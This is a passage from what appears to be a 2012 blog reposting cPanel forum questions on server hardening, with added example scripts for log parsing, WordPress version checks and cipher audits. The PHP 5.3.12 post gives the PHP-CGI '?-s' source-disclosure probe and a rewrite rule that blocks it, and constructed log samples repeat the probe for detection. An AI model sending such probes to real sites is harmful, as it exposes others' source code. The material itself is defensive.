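2012-05-20 03:36:43 SMTP connection from (bxkqlnohhfh) [198.51.100.2]:42054 closed by DROP in ACL
2012-05-20 03:37:23 SMTP connection from (windows-xp) [192.0.2.1]:42242 closed by DROP in ACL
2012-05-20 03:37:27 SMTP connection from (dell-2e58bfb0ba) [203.0.113.9]:16332 closed by DROP in ACL
2012-05-20 03:37:39 SMTP connection from (bubu-b74b3fbaa7) [192.0.2.1]:25125 closed by DROP in ACL
2012-05-20 03:38:01 SMTP connection from (school-0a0b7ad4) [198.51.100.2]:3029 closed by DROP in ACL
2012-05-20 03:38:05 <= user@example.org H=mail.example.org [203.0.113.50] P=esmtp S=1234
"""


def parse_drops(lines, since=None):
    """Yield (timestamp, helo_name, ip) per DROP line. Exim's timestamps are
    fixed-width "YYYY-MM-DD HH:MM:SS", so a plain string comparison orders them
    correctly and `since` can be given in the same form."""
    for line in lines:
        m = DROP_RE.match(line)
        if not m:
            continue
        ts = m.group(1)
        if since is not None and ts < since:
            continue
        yield ts, m.group(2) or "", m.group(3)


def repeat_offenders(lines, threshold=3, since=None):
    """[(ip, hits)] for peers dropped at least `threshold` times, busiest first."""
    counts = Counter(ip for _ts, _helo, ip in parse_drops(lines, since))
    return [(ip, n) for ip, n in counts.most_common() if n >= threshold]


def csf_deny_commands(offenders, ttl_seconds=86400):
    """Temporary blocks rather than permanent ones: the bots' addresses are
    largely dynamic and will belong to someone else before long."""
    return [f'csf -td {ip} {ttl_seconds} "exim DROP in ACL x{n}"' for ip, n in offenders]


if __name__ == "__main__":
    with open("/var/log/exim_mainlog") as fh:       # cPanel's Exim log path
        for cmd in csf_deny_commands(repeat_offenders(fh, threshold=10)):
            print(cmd)
```

Each dropped connection already cost the peer a TCP handshake and got nothing back, so the firewall block mainly saves Exim the work of accepting and dropping again; the `since` parameter is there so a cron run only looks at the last window instead of re-counting the whole log and re-blocking addresses whose temporary entry has already expired.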
Sunday, 20 May 2012
[Cpanel Blog] Version scans May,2012
Hey guys,
I'm aware there are a LOT of security plugins. But I've been through a large number and most appear focused on either detecting intrusions or providing "generic" filters.
I'm considering this.
90% of our hosts just run a Wordpress installation.
90% of those never update it.
A plugin that would simply email me and say "these four accounts have out of date Wordpress installations" sounds interesting.
Does such a thing exist? I'm interested in a development effort once I'm sure I'm not covering someone else's ground.
Version scans
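The check the poster describes only needs one file per account: WordPress stores its version in wp-includes/version.php as $wp_version = '...';. The script below is an added example (not from the post or any existing plugin) that walks a /home-style tree, reads that file from each account's docroot without executing any PHP, and reports the accounts whose version is older than a version you pass in. The sample tree, the account names and the "current" version used in the demo are all constructed; the real current version has to come from wordpress.org at run time. It only looks at the docroot, so a WordPress installed in a subdirectory or an addon-domain directory would need the scan extended.

```python
import os
import re
import tempfile

# $wp_version = '3.3.2'; as it appears in wp-includes/version.php
VERSION_RE = re.compile(r"""\$wp_version\s*=\s*['"]([^'"]+)['"]\s*;""")


def read_wp_version(docroot):
    """Return the version string from docroot/wp-includes/version.php, or None if it is not a WordPress install."""
    path = os.path.join(docroot, "wp-includes", "version.php")
    try:
        with open(path, encoding="utf-8", errors="replace") as fh:
            m = VERSION_RE.search(fh.read())
    except OSError:
        return None
    return m.group(1) if m else None


def version_tuple(v):
    """'3.3.2' -> (3, 3, 2) so versions compare numerically rather than as strings."""
    return tuple(int(p) if p.isdigit() else 0 for p in v.split("."))


def scan_accounts(home_root, docroot_subdir="public_html"):
    """Map account name -> WordPress version for every account whose docroot holds WordPress."""
    found = {}
    for account in sorted(os.listdir(home_root)):
        v = read_wp_version(os.path.join(home_root, account, docroot_subdir))
        if v is not None:
            found[account] = v
    return found


def outdated(found, current):
    """Subset of `found` whose version is older than `current`."""
    return {acct: v for acct, v in found.items() if version_tuple(v) < version_tuple(current)}


def report(home_root, current):
    """Text suitable for the email the post asks for: one line per out-of-date account."""
    old = outdated(scan_accounts(home_root), current)
    return "\n".join(f"{a}: {v} (current {current})" for a, v in sorted(old.items()))


def make_sample_home():
    """Constructed stand-in for /home: two WordPress accounts and one plain site."""
    root = tempfile.mkdtemp(prefix="wp-scan-")
    for acct, ver in (("alice", "3.3.2"), ("bob", "3.1.4")):
        inc = os.path.join(root, acct, "public_html", "wp-includes")
        os.makedirs(inc)
        with open(os.path.join(inc, "version.php"), "w", encoding="utf-8") as fh:
            fh.write(f"<?php\n$wp_version = '{ver}';\n")
    os.makedirs(os.path.join(root, "carol", "public_html"))
    return root


if __name__ == "__main__":
    demo_root = make_sample_home()
    print(report(demo_root, "3.3.2"))  # assumed "current" version for the demo only
```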
Posted by Bimo Hery Prabowo at 01.32, 0 comments
Friday, 18 May 2012
[Cpanel Blog] Site Down due to IP flood? May,2012
Hi,
My site has been going down recently and I have checked NETSTAT (please see attached)
Do you think this is what is causing the problem?
Thanks,
Danny
Attached Files: test.txt (189.0 KB)
Site Down due to IP flood?
Posted by Bimo Hery Prabowo at 19.32, 0 comments
[Cpanel Blog] how to protect whm/cpanel (the host web application ) using mod_security? May,2012
Hi,
I'm just wondering how I could protect WHM/cPanel with the help of mod_security.
I mean, when I try to enter the WHM panel using port 2086, I want to add more constraints to my mod_security so that it can protect cPanel/WHM.
At the moment I'm not able to do that.
cheers
how to protect whm/cpanel (the host web application ) using mod_security?
Posted by Bimo Hery Prabowo at 13.32, 0 comments
[Cpanel Blog] Apache security May,2012
Do I have to run the patch described at the URL below? I am running apache-2.2.22, build date 1st March.
http://forums.cpanel.net/f185/how-pr...tml#post996441
I was a victim of this issue the day before yesterday.
Apache security
Posted by Bimo Hery Prabowo at 07.32, 0 comments
[Cpanel Blog] What to do about Ddos attacks to my server? May,2012
Howzit...
Had a Ddos attack last week...
What is the best action to take?
Thanks...
What to do about Ddos attacks to my server?
Posted by Bimo Hery Prabowo at 01.32, 0 comments
Wednesday, 16 May 2012
[Cpanel Blog] Lost password May,2012
Hello, my name is deroch. I am Belgian and since yesterday I have forgotten my password to access cPanel. I contacted my hosting provider (-removed link-), but he does not answer.
Will you help me get my password?
Sorry for my English
I need help please :(
Lost password
Posted by Bimo Hery Prabowo at 13.32, 0 comments
[Cpanel Blog] The site's security certificate is not trusted! May,2012
Hi Everyone
I am new to this forum and to cPanel so please forgive my ignorance and I am sorry if I have put this thread in the wrong place.
I have a dedicated server that uses WHM and cPanel with a small number of hosting accounts on it.
All has been going well with it until recently when I spoke to my supplier about how I could get Parked Domains to work on my accounts.
The supplier talked me through the process which was basically to go to tweaks and change a setting.
After doing this the issue with Parked Domains was solved and all was well and good.
I then noticed that any time myself or one of my clients tried to log into cPanel or Webmail we now got a warning screen with "The site's security certificate is not trusted!".
Now my supplier is telling me I will need to buy a SSL certificate to stop the warning message.
My questions are these:
Why would a small change to WHM cause such an issue?
How could I have had an https connection before and now I don't? Is there some sort of certificate provided with new installs of WHM? Sorry, I am pretty ignorant on certificates, as you can probably tell.
Is it unreasonable of me to ask for the system to be put back to how it was without buying a certificate? Can that even be done?
I am not trying to be mean or anything, and I am happy to buy a certificate if I need one, but it is more the issue that it did work and now it does not, and I just hate not knowing what caused a problem or how it was working before the simple change.
Any advice or guidance on this is greatly appreciated
Alex
The site's security certificate is not trusted!
Posted by Bimo Hery Prabowo at 07.32, 0 comments
[Cpanel Blog] PCI Compliance with SecurityMetrics - Weak Ciphers May,2012
Hi,
I've been having a hard time passing a SecurityMetrics scan.
The problem seems to be related to ports 443 and port 465 supporting weak ciphers.
I have followed all the recommendations to disable SSLv2 and low and medium ciphers for Exim and OpenSSL.
However, securitymetrics techs just emailed me the following:
Any idea please!
----------------------------------------------------------------------------------------
Here is the list of SSL ciphers supported by the remote server Host
Low Strength Ciphers (< 56-bit key)
TLSv1
EXP-EDH-RSA-DES-CBC-SHA Kx=DH(512) Au=RSA Enc=DES(40) Mac=SHA1 export
EXP-DES-CBC-SHA Kx=RSA(512) Au=RSA Enc=DES(40) Mac=SHA1 export
EXP-RC2-CBC-MD5 Kx=RSA(512) Au=RSA Enc=RC2(40) Mac=MD5 export
EXP-RC4-MD5 Kx=RSA(512) Au=RSA Enc=RC4(40) Mac=MD5 export
High Strength Ciphers (>= 112-bit key)
TLSv1
EDH-RSA-DES-CBC3-SHA Kx=DH Au=RSA Enc=3DES(168) Mac=SHA1
DHE-RSA-AES128-SHA Kx=DH Au=RSA Enc=AES(128) Mac=SHA1
DHE-RSA-AES256-SHA Kx=DH Au=RSA Enc=AES(256) Mac=SHA1
DES-CBC3-SHA Kx=RSA Au=RSA Enc=3DES(168) Mac=SHA1
AES128-SHA Kx=RSA Au=RSA Enc=AES(128) Mac=SHA1
AES256-SHA Kx=RSA Au=RSA Enc=AES(256) Mac=SHA1
==========================================================================
Once these ciphers have been disabled a new scan should be ran to remove the issues.
--------------------------------------------------------------------------------------------------------------
Here's what I got from my server:
root@dipel [/home/user]# openssl ciphers
DHE-RSA-AES256-SHA:DHE-DSS-AES256-SHA:AES256-SHA:KRB5-DES-CBC3-MD5:KRB5-DES-CBC3-SHA:EDH-RSA-DES-CBC3-SHA:EDH-DSS-DES-CBC3-SHA:DES-CBC3-SHA:DES-CBC3-MD5:DHE-RSA-AES128-SHA:DHE-DSS-AES128-SHA:AES128-SHA:RC2-CBC-MD5:KRB5-RC4-MD5:KRB5-RC4-SHA:RC4-SHA:RC4-MD5:RC4-MD5:KRB5-DES-CBC-MD5:KRB5-DES-CBC-SHA:EDH-RSA-DES-CBC-SHA:EDH-DSS-DES-CBC-SHA:DES-CBC-SHA:DES-CBC-MD5:EXP-KRB5-RC2-CBC-MD5:EXP-KRB5-DES-CBC-MD5:EXP-KRB5-RC2-CBC-SHA:EXP-KRB5-DES-CBC-SHA:EXP-EDH-RSA-DES-CBC-SHA:EXP-EDH-DSS-DES-CBC-SHA:EXP-DES-CBC-SHA:EXP-RC2-CBC-MD5:EXP-RC2-CBC-MD5:EXP-KRB5-RC4-MD5:EXP-KRB5-RC4-SHA:EXP-RC4-MD5:EXP-RC4-MD5
PCI Compliance with SecurityMetrics - Weak Ciphers
Posted by Bimo Hery Prabowo at 01.32, 0 comments
Tuesday, 15 May 2012
[Cpanel Blog] Add new User or what May,2012
A friend of mine asked how to add a developer (I'm sure they'd be temporary) to their cPanel.
I think they would only want to add an FTP user.
What is the way they should handle this?
Add new User or what
Posted by Bimo Hery Prabowo at 07.32, 0 comments
[Cpanel Blog] IPTABLES Issue, not saving in CentOS 6.2 May,2012
Hi,
I'm using CentOS 6.2 x86_64 with CloudLinux and it seems IPTABLES is not saving.
I am trying to make it that you can only access whm on our main IP of the server. But trying other IPs I can still connect to WHM.
I have tried
iptables -A INPUT -s ! xxx.xxx.xxx.xxx -p tcp --dport 2082:2087 -j DROP
which warns "Using intrapositioned negation (`--option ! this`) is deprecated in favor of extrapositioned (`! --option this`)", and after a save I can still access WHM on other IPs.
iptables -A INPUT -s xxx.xxx.xxx.xxx -p tcp --dport 2082:2087 -j DROP
which gives no errors, but after saving I can still reach WHM on that IP.
IPTABLES Issue, not saving in CentOS 6.2
Posted by Bimo Hery Prabowo at 01.32, 0 comments
Monday, 14 May 2012
[Cpanel Blog] error install ConfigServer Security&Firewall May,2012
ERROR:
[root@ns204624 csf]# perl /etc/csf/csftest.pl
Testing ip_tables/iptable_filter...OK
Testing ipt_LOG...OK
Testing ipt_multiport/xt_multiport...OK
Testing ipt_REJECT...OK
Testing ipt_state/xt_state...OK
Testing ipt_limit/xt_limit...OK
Testing ipt_recent...OK
Testing xt_connlimit...FAILED [Error: iptables: Unknown error 4294967295] - Required for CONNLIMIT feature
Testing ipt_owner/xt_owner...FAILED [Error: iptables: Unknown error 4294967295] - Required for SMTP_BLOCK and UID/GID blocking features
Testing iptable_nat/ipt_REDIRECT...OK
RESULT: csf will function on this server but some features will not work due to some missing iptables modules [2]
error install ConfigServer Security&Firewall
Posted by Bimo Hery Prabowo at 19.32, 0 comments
[Cpanel Blog] Suhosin : custom setting Per user account May,2012
Hello :
Is it possible to have custom Suhosin settings per domain or user account?
server : fcgi
Thank you
Suhosin : custom setting Per user account
Posted by Bimo Hery Prabowo at 13.32, 0 comments
[Cpanel Blog] specific rule on modsecurity to scan any uploaded file May,2012
Hello mate,
I am searching for specific rule lines for scanning any file uploaded via any script such as vB or WordPress, etc.
I want a modsecurity rule to scan any uploaded file with my custom anti-virus script.
Can anyone provide me one?
As you know, the version of modsecurity on cPanel servers nowadays is 2.6.3.
Thank you in advance
specific rule on modsecurity to scan any uploaded file
Posted by Bimo Hery Prabowo at 07.32, 0 comments
[Cpanel Blog] Change All Cpanel User Passwords May,2012
Hello All,
My server was recently compromised by a hacker who installed some malware on the server, and after cleaning up, I wanted to change all user passwords on the server since many of them had been compromised. I searched around and it came down to needing to use the API to do this; I couldn't find any scripts, so I took the time and threw a quick PHP script together to get the job done.
Hope this helps someone
You can change the password length by changing the number in this function call $pass = random_gen(12);
And you can run the code and save the passwords by doing
php nameofscript.php > newpasswords.csv
PHP Code:
<?php
// Change every cPanel account's password through the WHM JSON API
// and print one "user","newpassword" CSV line per account that succeeded.
$whmusername = "root";
$whmpassword = "password";
$domain = "domain.com";
$query = "https://".$domain.":2087/json-api/listaccts";
$curl = curl_init();
// WHM often runs with a self-signed certificate, which is why verification is
// off here; turn it on (and set CURLOPT_CAINFO) if your WHM has a CA-signed cert.
curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($curl, CURLOPT_HEADER, 0);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
// No trailing "\n\r": a newline inside a header value corrupts the request header.
$header = array("Authorization: Basic " . base64_encode($whmusername.":".$whmpassword));
curl_setopt($curl, CURLOPT_HTTPHEADER, $header);
curl_setopt($curl, CURLOPT_URL, $query);
$result = curl_exec($curl);
if ($result === false)
{
    error_log("curl_exec threw error \"" . curl_error($curl) . "\" for $query");
    curl_close($curl);
    exit(1);
}
curl_close($curl);
$result = json_decode($result);
if (!isset($result->acct))
{
    error_log("unexpected listaccts response, no account list returned");
    exit(1);
}
foreach ($result->acct as $acct)
{
    $user = $acct->user;
    $pass = random_gen(12);
    // urlencode: the password may contain # or %, which would otherwise break the URL.
    $query2 = "https://".$domain.":2087/json-api/passwd?user=".urlencode($user)."&pass=".urlencode($pass);
    $curl2 = curl_init();
    curl_setopt($curl2, CURLOPT_SSL_VERIFYPEER, 0);
    curl_setopt($curl2, CURLOPT_SSL_VERIFYHOST, 0);
    curl_setopt($curl2, CURLOPT_HEADER, 0);
    curl_setopt($curl2, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($curl2, CURLOPT_HTTPHEADER, $header);
    curl_setopt($curl2, CURLOPT_URL, $query2);
    $result2 = curl_exec($curl2);
    if ($result2 === false)
    {
        error_log("curl_exec threw error \"" . curl_error($curl2) . "\" for user $user");
        curl_close($curl2);
        continue;
    }
    curl_close($curl2);
    $result2 = json_decode($result2);
    if (isset($result2->passwd[0]->status) && $result2->passwd[0]->status == 1)
    {
        echo '"'.$user.'","'.$pass.'"'."\n";
    }
    else
    {
        error_log("password change failed for $user");
    }
}
function random_gen($length)
{
    // Draw each character from the OS CSPRNG (openssl_random_pseudo_bytes, PHP 5.3+)
    // rather than srand()/rand(), whose output is predictable and unfit for passwords.
    $random = "";
    $char_list = "ABCDEFGHIJKLMNOPQRSTUVWXYZ";
    $char_list .= "abcdefghijklmnopqrstuvwxyz";
    $char_list .= "1234567890";
    $char_list .= "!@#$%^*";
    // Add the special characters to $char_list if needed
    $n = strlen($char_list);
    while (strlen($random) < $length)
    {
        $byte = ord(openssl_random_pseudo_bytes(1));
        if ($byte >= 256 - (256 % $n))
        {
            continue; // discard to avoid modulo bias
        }
        $random .= $char_list[$byte % $n];
    }
    return $random;
}
?>
Change All Cpanel User Passwords
Posted by Bimo Hery Prabowo at 01.32, 0 comments
Saturday, 12 May 2012
[Cpanel Blog] Is it necessary to set up a manual clam scan? May,2012
Hi;
We have configured ClamAv scanner (global setting) via WHM to scan:
Entire home directory
Mail
Public FTP space
Public web space
My questions:
With these settings configured, is it necessary to cron a scan of /home or /? Or can I rest assured that what we have is sufficient?
Where do I configure ClamAv to E-mail the administrator if it finds any suspected files?
Thanks in advance
Is it necessary to set up a manual clam scan?
Posted by Bimo Hery Prabowo at 07.32, 0 comments
[Cpanel Blog] Large Number of Failed Login Attempts from IP ... - auto blacklist? May,2012
I am often getting emails with "Large Number of Failed Login Attempts from IP ..." and options to block or whitelist. Can it automatically block the IP without me clicking the link and logging in to the website?
5 failed login attempts to account admin (system) -- Large number of attempts from this IP: 221.128.103.20
Reverse DNS: tot-103-20.pacific.net.th
Origin Country: Thailand (TH)
Please use the following links to add to the black list:
Single Ip: https://ip-111-222-333-444.ip.secureserver.net:2087/cgi/bl.cgi?ip=221.128.103.20
/24: https://ip-111-222-333-444.ip.secureserver.net:2087/cgi/bl.cgi?ip=221.128.103.0/24
/16: https://ip-111-222-333-444.ip.secureserver.net:2087/cgi/bl.cgi?ip=221.128.0.0/16
Please use the following links to add to the white list:
Single Ip: https://ip-111-222-333-444.ip.secureserver.net:2087/cgi/wl.cgi?ip=221.128.103.20
/24: https://ip-111-222-333-444.ip.secureserver.net:2087/cgi/wl.cgi?ip=221.128.103.0/24
/16: https://ip-111-222-333-444.ip.secureserver.net:2087/cgi/bl.cgi?ip=221.128.0.0/16
P.S. What do /24 and /16 mean?
Large Number of Failed Login Attempts from IP ... - auto blacklist?
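The /24 and /16 in the notice are CIDR prefix lengths: /32 is the single address, /24 is every address sharing the first three octets (256 addresses), and /16 shares the first two (65536 addresses). The Python below is an added example (not from the post or from cPanel's cPHulk notice) that pulls the offending IP out of the quoted notice text, works out the three candidate blocks with their sizes, and shows which other addresses a block would also cut off; that collateral is the reason to prefer the narrowest block that actually stops the attempts. The "other hosts" list is constructed for the demonstration.

```python
import ipaddress
import re

# The IP is taken from the notice line quoted in the post.
NOTICE_RE = re.compile(r"Large number of attempts from this IP: (?P<ip>\d{1,3}(?:\.\d{1,3}){3})")

SAMPLE_NOTICE = (
    "5 failed login attempts to account admin (system) -- "
    "Large number of attempts from this IP: 221.128.103.20"
)

# Constructed addresses standing in for other hosts you might care about
# (a customer's office, a monitoring box): one in the same /24, one only in the
# same /16, one unrelated.
OTHER_HOSTS = ["221.128.103.7", "221.128.9.200", "203.0.113.5"]


def extract_ip(notice_text):
    """Return the reported IP from a cPHulk-style notice, or None if absent."""
    m = NOTICE_RE.search(notice_text)
    return m.group("ip") if m else None


def block_options(ip_str):
    """The three blocks the notice offers (single IP, /24, /16) with the number of addresses each covers."""
    ip = ipaddress.ip_address(ip_str)
    options = {}
    for prefix in (32, 24, 16):
        net = ipaddress.ip_network(f"{ip}/{prefix}", strict=False)
        options[prefix] = (str(net), net.num_addresses)
    return options


def collateral(block_cidr, other_ips):
    """Which of `other_ips` would also be blocked by `block_cidr`."""
    net = ipaddress.ip_network(block_cidr)
    return sorted(s for s in other_ips if ipaddress.ip_address(s) in net)


if __name__ == "__main__":
    ip = extract_ip(SAMPLE_NOTICE)
    for prefix, (cidr, size) in block_options(ip).items():
        print(f"/{prefix}: {cidr} covers {size} addresses; also blocks {collateral(cidr, OTHER_HOSTS)}")
```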
Posted by Bimo Hery Prabowo at 01.32, 0 comments
Thursday, 10 May 2012
[Cpanel Blog] CSF and Google bots ??? May,2012
Hello Every one,
Since I started using CSF on my server, my clients have been complaining that their Google rankings are going down, as Google cannot communicate with the domains on the server, and this is what it has to say:
URLs timed out - Network availability of your DNS and web servers
I need to know how I can whitelist Google bots in CSF so that this issue gets addressed.
This is what Google has to say :
Google doesn't post a public list of IP addresses for webmasters to whitelist. This is because these IP address ranges can change, causing problems for any webmasters who have hard coded them. The best way to identify accesses by Googlebot is to use the user-agent (Googlebot).
Hence, how can we add Googlebot to CSF?
Please assist !!!!
CSF and Google bots ???
Posted by Bimo Hery Prabowo at 01.32, 0 comments
Tuesday, 08 May 2012
[Cpanel Blog] Beast TLS Vulnerability May,2012
I did some searching, and I can't find any cPanel references for this vulnerability. Will the fix below work with cPanel?
Mitigating the BEAST attack on TLS
This is the vulnerability information from McAfee Secure:
SSL/TLS Protocol Initialization Vector Implementation Information Disclosure Vulnerability
A vulnerability exists in SSL 3.0 and TLS 1.0 that could allow information disclosure if an attacker intercepts encrypted traffic served from an affected system. TLS 1.1, TLS 1.2, and all cipher suites that do not use CBC mode are not affected. This script tries to establish an SSL/TLS remote connection using an affected SSL version and cipher suite, and then solicits return data. If returned application data is not fragmented with an empty or one-byte record, it is likely vulnerable. OpenSSL uses empty fragments as a countermeasure unless the 'SSL_OP_DONT_INSERT_EMPTY_FRAGMENTS' option is specified when OpenSSL is initialized. Microsoft implemented one-byte fragments as a countermeasure, and the setting can be controlled via the registry key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SecurityProviders\SCHANNEL\SendExtraRecord. Therefore, if multiple applications use the same SSL/TLS implementation, some may be vulnerable while others may not, depending on whether or not a countermeasure has been enabled. Note that this script detects the vulnerability in the SSLv3/TLSv1 protocol implemented in the server. It does not detect the BEAST attack where it exploits the vulnerability at HTTPS client-side (i.e., Internet browser). The detection at server-side does not necessarily mean your server is vulnerable to the BEAST attack because the attack exploits the vulnerability at client-side, and both SSL/TLS clients and servers can independently employ the split record countermeasure.
Configure SSL/TLS servers to only use TLS 1.1 or TLS 1.2 if supported. Configure SSL/TLS servers to only support cipher suites that do not use block ciphers. Apply patches if available.
Beast TLS Vulnerability
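The SecurityMetrics post above lists cipher suites in the same "NAME Kx=... Au=... Enc=ALG(bits) Mac=... [export]" layout that openssl ciphers -v prints, and the BEAST write-up here turns on one property of the same suites (CBC mode under SSLv3/TLSv1). The script below is an added example (not from either post, the scanner or OpenSSL) with one parser that serves both: it reads a report in that layout, sorts each suite into the scanner's strength bands (< 56-bit low, < 112-bit medium, otherwise high, with export suites always flagged), and separately marks the suites that run a block cipher in CBC mode. The sample report is the scanner output quoted in the PCI post plus one constructed TLSv1.2 AES-GCM line to show an AEAD suite being left alone; the "TLSv1" and "... Strength Ciphers" headings are skipped. Note that the scanner counts 3DES(168) as high strength although its effective strength is 112 bits.

```python
import re

# One suite per line, as in the scanner report and in `openssl ciphers -v`
# (the protocol column is optional because the scanner prints it as a heading).
CIPHER_RE = re.compile(
    r"^(?P<name>[A-Z0-9-]+)\s+(?:(?P<proto>SSLv2|SSLv3|TLSv1(?:\.\d)?)\s+)?"
    r"Kx=(?P<kx>\S+)\s+Au=(?P<au>\S+)\s+Enc=(?P<enc>[A-Za-z0-9-]+)\((?P<bits>\d+)\)\s+"
    r"Mac=(?P<mac>\S+)(?P<export>\s+export)?\s*$"
)

# Block ciphers that the classic suites run in CBC mode. RC4 is a stream cipher,
# so it is not CBC; GCM/CCM/Poly1305 suites are AEAD and excluded in is_cbc().
BLOCK_CIPHERS = {"DES", "3DES", "AES", "RC2", "CAMELLIA", "SEED", "IDEA"}

# The ten suites quoted in the PCI post, plus one constructed AEAD line.
SCANNER_REPORT = """\
Low Strength Ciphers (< 56-bit key)
TLSv1
EXP-EDH-RSA-DES-CBC-SHA Kx=DH(512) Au=RSA Enc=DES(40) Mac=SHA1 export
EXP-DES-CBC-SHA Kx=RSA(512) Au=RSA Enc=DES(40) Mac=SHA1 export
EXP-RC2-CBC-MD5 Kx=RSA(512) Au=RSA Enc=RC2(40) Mac=MD5 export
EXP-RC4-MD5 Kx=RSA(512) Au=RSA Enc=RC4(40) Mac=MD5 export
High Strength Ciphers (>= 112-bit key)
TLSv1
EDH-RSA-DES-CBC3-SHA Kx=DH Au=RSA Enc=3DES(168) Mac=SHA1
DHE-RSA-AES128-SHA Kx=DH Au=RSA Enc=AES(128) Mac=SHA1
DHE-RSA-AES256-SHA Kx=DH Au=RSA Enc=AES(256) Mac=SHA1
DES-CBC3-SHA Kx=RSA Au=RSA Enc=3DES(168) Mac=SHA1
AES128-SHA Kx=RSA Au=RSA Enc=AES(128) Mac=SHA1
AES256-SHA Kx=RSA Au=RSA Enc=AES(256) Mac=SHA1
ECDHE-RSA-AES128-GCM-SHA256 TLSv1.2 Kx=ECDH Au=RSA Enc=AESGCM(128) Mac=AEAD
"""


def parse_ciphers(text):
    """Return one dict per suite line; heading lines do not match and are skipped."""
    suites = []
    for line in text.splitlines():
        m = CIPHER_RE.match(line.strip())
        if not m:
            continue
        d = m.groupdict()
        d["bits"] = int(d["bits"])
        d["export"] = d["export"] is not None
        suites.append(d)
    return suites


def strength_band(bits):
    """The scanner's bands by symmetric key size."""
    if bits < 56:
        return "low"
    if bits < 112:
        return "medium"
    return "high"


def is_cbc(suite):
    """True for a block cipher in CBC mode (the suites the BEAST text is about)."""
    enc = suite["enc"].upper()
    aead = enc.endswith("GCM") or enc.endswith("CCM") or "POLY1305" in enc
    return not aead and enc in BLOCK_CIPHERS


def weak_suites(suites):
    """Names the PCI scan would object to: anything below the high band, or export grade."""
    return [s["name"] for s in suites if s["export"] or strength_band(s["bits"]) != "high"]


def cbc_suites(suites):
    return [s["name"] for s in suites if is_cbc(s)]


if __name__ == "__main__":
    parsed = parse_ciphers(SCANNER_REPORT)
    print("weak:", weak_suites(parsed))
    print("CBC:", cbc_suites(parsed))
```

Feeding the output of openssl ciphers -v '<your cipher string>' into parse_ciphers lets you confirm a candidate cipher string before the next scan: an empty weak_suites() answers the PCI finding, and what remains in cbc_suites() is what the BEAST text is talking about for TLS 1.0 connections.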
Posted by Bimo Hery Prabowo at 07.32, 0 comments
[Cpanel Blog] reporting abuse procedure? May,2012
Two questions:
1. What's the standard procedure for reporting abuse, i.e. another IP just hammering your box? I can get the abuse email (usually) from a whois on the IP - is there a better way? After getting the correct abuse email, what should typically be contained in the email?
2. Is there any way to get cphulk to automatically fire off abuse emails when an IP repeatedly triggers it?
Thanks!
reporting abuse procedure?
Posted by Bimo Hery Prabowo at 01.32, 0 comments
Monday, 07 May 2012
Cpanel Blog PHP 5.3.12 Security Vulnerability Patch May,2012
Can we please get PHP 5.3.12 released into EasyApache?
There is a vulnerability in certain CGI-based setups (Apache+mod_php and nginx+php-fpm are not affected) that has gone unnoticed for at least 8 years. Section 7 of the CGI spec states:
Some systems support a method for supplying a [sic] array of strings to the CGI script. This is only used in the case of an `indexed' query. This is identified by a "GET" or "HEAD" HTTP request with a URL search string not containing any unencoded "=" characters.
So, requests that do not have a "=" in the query string are treated differently from those that do in some CGI implementations. For PHP this means that a request containing ?-s may dump the PHP source code for the page, but a request that has ?-s&=1 is fine.
A large number of sites run PHP as either an Apache module through mod_php or using php-fpm under nginx. Neither of these setups is vulnerable to this. Straight shebang-style CGI also does not appear to be vulnerable.
If you are using Apache mod_cgi to run PHP you may be vulnerable. To see if you are, just add ?-s to the end of any of your URLs. If you see your source code, you are vulnerable. If your site renders normally, you are not.
To fix this, update to PHP 5.3.12 or PHP 5.4.2.
We recognize that since CGI is a rather outdated way to run PHP, it may not be feasible to upgrade these sites to a modern version of PHP. An alternative is to configure your web server to not let these types of requests with query strings starting with a "-" and not containing a "=" through. Adding a rule like this should not break any sites. For Apache using mod_rewrite it would look like this:
RewriteCond %{QUERY_STRING} ^(%2d|-)[^=]+$ [NC]
RewriteRule ^(.*) $1? [L]
If you are writing your own rule, be sure to take the urlencoded ?%2ds version into account.
PHP 5.3.12 Security Vulnerability Patch
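The mod_rewrite rule quoted above works because it matches exactly the class of query string the CGI spec calls an "indexed query" (no unencoded "=") when it begins with a dash, in either its literal or its %2d-encoded form. The Python below is an added example (not from the post, php.net or cPanel) that reproduces that condition, so you can test candidate query strings against it offline, and runs it over access-log lines to find requests the rule would have caught, which is the defender's view of the same thing: a quick way to see whether a server that still runs PHP under mod_cgi has been receiving these probes. The log lines are constructed; the regular expression is copied from the rule, including its requirement of at least one character after the dash.

```python
import re
from urllib.parse import urlsplit

# Same pattern as the quoted RewriteCond: starts with "-" or "%2d" (any case),
# and contains no unencoded "=" anywhere after it.
DASH_QUERY = re.compile(r"^(%2d|-)[^=]+$", re.IGNORECASE)

# Apache combined-format request line: client, timestamp, method, target, status.
REQUEST_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<when>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

# Constructed access-log lines: two requests the rule catches, three it leaves alone.
SAMPLE_LOG = [
    '203.0.113.9 - - [07/May/2012:10:00:01 +0000] "GET /index.php?-s HTTP/1.1" 200 812',
    '203.0.113.9 - - [07/May/2012:10:00:02 +0000] "GET /index.php?%2Ds HTTP/1.1" 200 812',
    '198.51.100.4 - - [07/May/2012:10:00:03 +0000] "GET /index.php?-s&=1 HTTP/1.1" 200 812',
    '198.51.100.4 - - [07/May/2012:10:00:04 +0000] "GET /index.php?page=2 HTTP/1.1" 200 812',
    '198.51.100.4 - - [07/May/2012:10:00:05 +0000] "GET /index.php HTTP/1.1" 200 812',
]


def is_indexed_query(qs):
    """CGI 'indexed query' as the spec section quoted above defines it: non-empty, no unencoded '='."""
    return qs != "" and "=" not in qs


def would_be_blocked(qs):
    """True when the quoted RewriteCond matches, i.e. the rule would strip the query string."""
    return DASH_QUERY.match(qs) is not None


def flag_requests(log_lines):
    """(client, target) for every logged request whose query string the rule would catch."""
    hits = []
    for line in log_lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        qs = urlsplit(m.group("target")).query  # urlsplit does not decode %2D, matching QUERY_STRING
        if would_be_blocked(qs):
            hits.append((m.group("client"), m.group("target")))
    return hits


if __name__ == "__main__":
    for client, target in flag_requests(SAMPLE_LOG):
        print(f"{client} requested {target}")
```

Note that the rule applies to every method, not only GET and HEAD, and that "?-" on its own (nothing after the dash) does not match the [^=]+ part; both follow from the rule as written rather than from the CGI spec.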
